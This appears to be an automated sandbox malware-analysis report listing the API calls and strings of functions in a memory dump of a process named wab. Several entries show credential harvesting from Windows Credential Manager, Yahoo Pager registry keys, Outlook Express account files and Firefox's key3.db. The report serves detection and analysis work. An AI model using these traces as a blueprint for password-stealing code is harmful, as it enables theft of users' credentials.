                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443E43
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443E5C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443E70
                                                                                                                                                                                                                      • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00443E8C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443EB1
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443EC7
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443F07
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset$strlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2142929671-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                      • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                      • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                      • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F133
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040F144
                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                    • String ID: Passport.Net\*
                                                                                                                                                                                                                    • API String ID: 2329438634-3671122194
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004032FD
                                                                                                                                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040334C
                                                                                                                                                                                                                      • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040338E
                                                                                                                                                                                                                      • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                    • String ID: Personalities
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
                                                                                                                                                                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FromStringUuid$memcpy
                                                                                                                                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                                      • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                      • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409031
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • {?@ UD, xrefs: 0040900D
                                                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,76A071C0,00405E9E,00000000), ref: 00410912
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410938
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID: $no query solution
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                    • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                                                    • API String ID: 231171946-3708268960
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                    • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                    • API String ID: 438689982-3457389245
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: winRead
                                                                                                                                                                                                                    • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A8F8
                                                                                                                                                                                                                      • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A93D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                    • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 125969286-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00408E33
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00408E40
                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00408E4B
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                                                                                                                                                                                                      • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                                                                                                                                                                                                      • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                                                                                                                                                                                                      • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                                      • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                                      • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                                      • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                                    • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                                                                                                                                                                                                    • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2374668499-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AAB7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AACD
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AB04
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <%s>, xrefs: 0040AAFE
                                                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                    • API String ID: 3699762281-1998499579
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                                                                                                                                                                                                      • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                                                                                                                                                                                                      • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                                                                                                                                                                                                      • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00410113
                                                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 0041011B
                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00410125
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                                                                                                                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2775283111-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(0000000A), ref: 00405F44
                                                                                                                                                                                                                      • Part of subcall function 004015F3: GetDlgItem.USER32(?,?), ref: 00401603
                                                                                                                                                                                                                      • Part of subcall function 004015F3: GetClientRect.USER32(?,?), ref: 00401615
                                                                                                                                                                                                                      • Part of subcall function 004015F3: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 0040167F
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 00406003
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 0040600E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                    • API String ID: 2498372239-3993045852
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004068B2
                                                                                                                                                                                                                      • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                                      • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                                      • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID: C@$key3.db
                                                                                                                                                                                                                    • API String ID: 1968906679-1993167907
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BFE7
                                                                                                                                                                                                                    • SetFocus.USER32(?,?), ref: 0040C06F
                                                                                                                                                                                                                      • Part of subcall function 0040BFB1: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040BFC0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                                                                                                                                    • String ID: +_@$l
                                                                                                                                                                                                                    • API String ID: 3436799508-640399337
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                                      • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
